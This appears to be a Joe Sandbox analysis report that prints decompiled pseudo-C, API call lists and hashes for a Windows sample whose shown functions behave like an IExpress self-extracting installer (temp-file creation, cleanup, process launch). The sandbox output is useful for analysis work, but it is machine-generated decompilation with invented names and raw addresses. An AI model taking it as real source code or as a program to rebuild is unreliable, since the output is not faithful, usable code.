                                                                                                                                                                                                      				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                      				_t53 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                      					if(0 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(0 != _t56) {
                                                                                                                                                                                                      						Sleep(0x3e8);
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t58 = 1;
                                                                                                                                                                                                      						_t53 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                      					_t67 =  *0xa688b0 - _t58; // 0x2
                                                                                                                                                                                                      					if(_t67 != 0) {
                                                                                                                                                                                                      						__eflags =  *0xa688b0; // 0x2
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							 *0xa681e4 = _t58;
                                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							 *0xa688b0 = _t58;
                                                                                                                                                                                                      							_t37 = E00A66C3F(0xa610b8, 0xa610c4); // executed
                                                                                                                                                                                                      							__eflags = _t37;
                                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                                      								goto L13;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                      								_t30 = 0xff;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_push(0x1f);
                                                                                                                                                                                                      						L00A66FF4();
                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                      						_t68 =  *0xa688b0 - _t58; // 0x2
                                                                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                                                                      							_push(0xa610b4);
                                                                                                                                                                                                      							_push(0xa610ac);
                                                                                                                                                                                                      							L00A67202();
                                                                                                                                                                                                      							 *0xa688b0 = 2;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if(_t53 == 0) {
                                                                                                                                                                                                      							 *0xa688ac = 0;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t71 =  *0xa688b4;
                                                                                                                                                                                                      						if( *0xa688b4 != 0 && E00A67060(_t71, 0xa688b4) != 0) {
                                                                                                                                                                                                      							_t60 =  *0xa688b4; // 0x0
                                                                                                                                                                                                      							 *0xa6a288(0, 2, 0);
                                                                                                                                                                                                      							 *_t60();
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t25 = __imp___acmdln; // 0x76665b9c
                                                                                                                                                                                                      						_t59 =  *_t25;
                                                                                                                                                                                                      						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							_t41 =  *_t59;
                                                                                                                                                                                                      							if(_t41 > 0x20) {
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							if(_t41 != 0) {
                                                                                                                                                                                                      								if(_t54 != 0) {
                                                                                                                                                                                                      									goto L32;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                      										_t59 = _t59 + 1;
                                                                                                                                                                                                      										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      										_t41 =  *_t59;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                      							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                    _t29 = 0xa;
                } else {
                    _t29 =  *(_t62 - 0x38) & 0x0000ffff;
                }
                _push(_t29);
                _t30 = E00A62BFB(0xa60000, 0, _t59); // executed
                *0xa681e0 = _t30;
                __eflags =  *0xa681f8;
                if( *0xa681f8 == 0) {
                    exit(_t30); // executed
                    goto L32;
                }
                __eflags =  *0xa681e4;
                if( *0xa681e4 == 0) {
                    __imp___cexit();
                    _t30 =  *0xa681e0; // 0x0
                }
                *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                goto L40;
                L32:
                __eflags = _t41 - 0x22;
                if(_t41 == 0x22) {
                    __eflags = _t54;
                    _t15 = _t54 == 0;
                    __eflags = _t15;
                    _t54 = 0 | _t15;
                    *(_t62 - 0x20) = _t54;
                }
                _t26 = _t41 & 0x000000ff;
                __imp___ismbblead(_t26);
                __eflags = _t26;
                if(_t26 != 0) {
                    _t59 = _t59 + 1;
                    __eflags = _t59;
                    *(_t62 - 0x1c) = _t59;
                }
                _t59 = _t59 + 1;
                *(_t62 - 0x1c) = _t59;
            }
        }
        L40:
        return E00A6724D(_t30);
    }
    _t58 = 1;
    __eflags = 1;
    goto L7;
}


















                                                                                                                                                                                                      0x00a66abe
                                                                                                                                                                                                      0x00a66abe
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00A67155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A67182
                                                                                                                                                                                                        • Part of subcall function 00A67155: GetCurrentProcessId.KERNEL32 ref: 00A67191
                                                                                                                                                                                                        • Part of subcall function 00A67155: GetCurrentThreadId.KERNEL32 ref: 00A6719A
                                                                                                                                                                                                        • Part of subcall function 00A67155: GetTickCount.KERNEL32 ref: 00A671A3
                                                                                                                                                                                                        • Part of subcall function 00A67155: QueryPerformanceCounter.KERNEL32(?), ref: 00A671B8
                                                                                                                                                                                                      • GetStartupInfoW.KERNEL32(?,00A672B8,00000058), ref: 00A66A7F
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 00A66AB4
                                                                                                                                                                                                      • _amsg_exit.MSVCRT ref: 00A66AC9
                                                                                                                                                                                                      • _initterm.MSVCRT ref: 00A66B1D
                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00A66B49
                                                                                                                                                                                                      • exit.KERNELBASE ref: 00A66BBF
                                                                                                                                                                                                      • _ismbblead.MSVCRT ref: 00A66BDA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 836923961-0
                                                                                                                                                                                                      • Opcode ID: 2d9f9588cb439d52394877b57031ab550b7d8ed08d16713bc8b1c7f4be327b16
                                                                                                                                                                                                      • Instruction ID: 6ca1e573949378a7017ba58b39c4289277771272b4b8fa90933c770cc0bb4612
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d9f9588cb439d52394877b57031ab550b7d8ed08d16713bc8b1c7f4be327b16
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0241E170984625DBDB21DBA8D9147AA7BF8FB45760F24421AE841E3290CFB84C428B80
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 587 a658c8-a658d5 588 a658d8-a658dd 587->588 588->588 589 a658df-a658f1 LocalAlloc 588->589 590 a658f3-a65901 call a644b9 589->590 591 a65919-a65959 call a61680 call a6658a CreateFileA LocalFree 589->591 594 a65906-a65910 call a66285 590->594 591->594 600 a6595b-a6596c CloseHandle GetFileAttributesA 591->600 601 a65912-a65918 594->601 600->594 602 a6596e-a65970 600->602 602->594 603 a65972-a6597b 602->603 603->601
                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E00A658C8(intOrPtr* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				signed char _t16;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				intOrPtr* _t27;
                                                                                                                                                                                                      				CHAR* _t33;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t33 = __ecx;
                                                                                                                                                                                                      				_t27 = __ecx;
                                                                                                                                                                                                      				_t23 = __ecx + 1;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t6 =  *_t27;
                                                                                                                                                                                                      					_t27 = _t27 + 1;
                                                                                                                                                                                                      				} while (_t6 != 0);
                                                                                                                                                                                                      				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                      				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                      				if(_t20 != 0) {
                                                                                                                                                                                                      					E00A61680(_t20, _t36, _t33);
                                                                                                                                                                                                      					E00A6658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                      					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                      					_v8 = _t10;
                                                                                                                                                                                                      					LocalFree(_t20);
                                                                                                                                                                                                      					_t12 = _v8;
                                                                                                                                                                                                      					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                      						goto L4;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						CloseHandle(_t12);
                                                                                                                                                                                                      						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                      						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							 *0xa69124 = 0;
                                                                                                                                                                                                      							_t14 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E00A644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					L4:
                                                                                                                                                                                                      					 *0xa69124 = E00A66285();
                                                                                                                                                                                                      					_t14 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t14;
                                                                                                                                                                                                      			}














                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00A65534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A658E7
                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00A65534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A65943
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00A65534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A6594D
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00A65534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A6595C
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00A65534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A65963
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$TMP4351$.TMP
                                                                                                                                                                                                      • API String ID: 747627703-441577946
                                                                                                                                                                                                      • Opcode ID: e3be04993e048d0beb8aaf6c7d282917a4634e4e8a77fe81d3a05038f32c85a8
                                                                                                                                                                                                      • Instruction ID: 876861b8cb4ecd03e0c29dbf5366538c6f1c380a92e64f969b72de4285949494
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e3be04993e048d0beb8aaf6c7d282917a4634e4e8a77fe81d3a05038f32c85a8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71110872A0021077C7249FB99C4DB9B7EBDDF56360F100619F516E31D1CFB09846C6A0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 604 a652b6-a652d4 605 a652d6 604->605 606 a65317-a6531f 604->606 607 a652d7-a652e0 605->607 608 a65321-a65328 606->608 609 a65379-a65381 606->609 610 a652e2-a652e9 607->610 611 a65300-a65314 LocalFree * 2 607->611 608->609 614 a6532a-a65331 608->614 612 a65383-a65385 609->612 613 a6538c-a653a0 call a66ce0 609->613 610->611 615 a652eb-a652fa SetFileAttributesA DeleteFileA 610->615 611->607 617 a65316 611->617 612->613 616 a65387 call a61fe1 612->616 614->609 619 a65333-a65351 call a61781 614->619 615->611 616->613 617->606 624 a65353-a65359 call a665e8 619->624 625 a6535e-a6536f SetCurrentDirectoryA call a62390 619->625 624->625 628 a65374 625->628 628->609
                                                                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                                                                      			E00A652B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed int _t11;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                      				CHAR** _t31;
                                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t28 = __edi;
                                                                                                                                                                                                      				_t22 = __ecx;
                                                                                                                                                                                                      				_t21 = __ebx;
                                                                                                                                                                                                      				_t9 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                                      				_t31 =  *0xa691e0; // 0x707b70
                                                                                                                                                                                                      				if(_t31 != 0) {
                                                                                                                                                                                                      					_push(__edi);
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t29 = _t31;
                                                                                                                                                                                                      						if( *0xa68a24 == 0 &&  *0xa69a30 == 0) {
                                                                                                                                                                                                      							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                      							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t31 = _t31[1];
                                                                                                                                                                                                      						LocalFree( *_t29);
                                                                                                                                                                                                      						LocalFree(_t29);
                                                                                                                                                                                                      					} while (_t31 != 0);
                                                                                                                                                                                                      					_pop(_t28);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 =  *0xa68a20; // 0x0
                                                                                                                                                                                                      				_pop(_t32);
                                                                                                                                                                                                      				if(_t11 != 0 &&  *0xa68a24 == 0 &&  *0xa69a30 == 0) {
                                                                                                                                                                                                      					_push(_t22);
                                                                                                                                                                                                      					E00A61781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                      					if(( *0xa69a34 & 0x00000020) != 0) {
                                                                                                                                                                                                      						E00A665E8( &_v268);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                      					_t22 =  &_v268;
                                                                                                                                                                                                      					E00A62390( &_v268);
                                                                                                                                                                                                      					_t11 =  *0xa68a20; // 0x0
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if( *0xa69a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                      					_t11 = E00A61FE1(_t22); // executed
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				 *0xa68a20 =  *0xa68a20 & 0x00000000;
                                                                                                                                                                                                      				return E00A66CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetFileAttributesA.KERNELBASE(00707B70,00000080,?,00000000), ref: 00A652F2
                                                                                                                                                                                                      • DeleteFileA.KERNELBASE(00707B70), ref: 00A652FA
                                                                                                                                                                                                      • LocalFree.KERNEL32(00707B70,?,00000000), ref: 00A65305
                                                                                                                                                                                                      • LocalFree.KERNEL32(00707B70), ref: 00A6530C
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(00A611FC,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00A65363
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00A65334
                                                                                                                                                                                                      • p{p, xrefs: 00A652CC
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$p{p
                                                                                                                                                                                                      • API String ID: 2833751637-2520046281
                                                                                                                                                                                                      • Opcode ID: 411f38ace24eacbb3b2a1e088141baccca55554beceb86b112ea1bff895f8a6f
                                                                                                                                                                                                      • Instruction ID: b033b9c77a3bc744211a8496696cebb1c174d9d74992d7375cd513e94b73b1d2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 411f38ace24eacbb3b2a1e088141baccca55554beceb86b112ea1bff895f8a6f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB216231910614DBDB31DFA0DD29B6977B8BB24B90F090259E9425A2A0CFF45D86CF41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      control_flow_graph 656 a63fef-a64010 657 a64016-a6403b CreateProcessA 656->657 658 a6410a-a6411a call a66ce0 656->658 659 a640c4-a64101 call a66285 GetLastError FormatMessageA call a644b9 657->659 660 a64041-a6406e WaitForSingleObject GetExitCodeProcess 657->660 674 a64106 659->674 663 a64070-a64077 660->663 664 a64091 call a6411b 660->664 663->664 668 a64079-a6407b 663->668 669 a64096-a640b8 CloseHandle * 2 664->669 668->664 671 a6407d-a64089 668->671 672 a640ba-a640c0 669->672 673 a64108 669->673 671->664 675 a6408b 671->675 672->673 676 a640c2 672->676 673->658 674->673 675->664 676->674
                                                                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                                                                      			E00A63FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v524;
                                                                                                                                                                                                      				long _v528;
                                                                                                                                                                                                      				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t20;
                                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                                      				int _t25;
                                                                                                                                                                                                      				intOrPtr* _t39;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				intOrPtr _t53;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t45 = __edx;
                                                                                                                                                                                                      				_t20 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                      				_t39 = __ecx;
                                                                                                                                                                                                      				_t49 = 1;
                                                                                                                                                                                                      				_t22 = 0;
                                                                                                                                                                                                      				if(__ecx == 0) {
                                                                                                                                                                                                      					L13:
                                                                                                                                                                                                      					return E00A66CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                      				if(_t25 == 0) {
                                                                                                                                                                                                      					 *0xa69124 = E00A66285();
                                                                                                                                                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                                                                                                                                                      					_t45 = 0x4c4;
                                                                                                                                                                                                      					E00A644B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					_t49 = 0;
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					_t22 = _t49;
                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                      				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                      				_t44 = _v528;
                                                                                                                                                                                                      				_t53 =  *0xa68a28; // 0x0
                                                                                                                                                                                                      				if(_t53 == 0) {
                                                                                                                                                                                                      					_t34 =  *0xa69a2c; // 0x0
                                                                                                                                                                                                      					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                      						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                      						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                      							 *0xa69a2c = _t44;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E00A6411B(_t34, _t44);
                                                                                                                                                                                                      				CloseHandle(_v544.hThread);
                                                                                                                                                                                                      				CloseHandle(_v544);
                                                                                                                                                                                                      				if(( *0xa69a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00A64033
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A64049
                                                                                                                                                                                                      • GetExitCodeProcess.KERNELBASE ref: 00A6405C
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00A6409C
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00A640A8
                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A640DC
                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A640E9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3183975587-0
                                                                                                                                                                                                      • Opcode ID: 8735c0539b1d46e0448f10ffed30d626af7a2f065044885a60b19a48663ee689
                                                                                                                                                                                                      • Instruction ID: 83544211def9188e66dfef8375650cf5d73dc0eac23f4b79c5085ea792fd510f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8735c0539b1d46e0448f10ffed30d626af7a2f065044885a60b19a48663ee689
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B031C531640218BBEB20DFA5DC4DFAB7B7CEBA9700F1002A9F515E21A1CA744D86CF51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A651E5(void* __eflags) {
                                                                                                                                                                                                      				int _t5;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t1 = E00A6468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                      				if(_t28 != 0) {
                                                                                                                                                                                                      					if(E00A6468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                      						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                      						if(_t5 != 0) {
                                                                                                                                                                                                      							_t6 = E00A644B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                      							LocalFree(_t28);
                                                                                                                                                                                                      							if(_t6 != 6) {
                                                                                                                                                                                                      								 *0xa69124 = 0x800704c7;
                                                                                                                                                                                                      								L10:
                                                                                                                                                                                                      								return 0;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *0xa69124 = 0;
                                                                                                                                                                                                      							L6:
                                                                                                                                                                                                      							return 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						LocalFree(_t28);
                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					E00A644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					LocalFree(_t28);
                                                                                                                                                                                                      					 *0xa69124 = 0x80070714;
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E00A644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      				 *0xa69124 = E00A66285();
                                                                                                                                                                                                      				goto L10;
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646A0
                                                                                                                                                                                                        • Part of subcall function 00A6468F: SizeofResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646A9
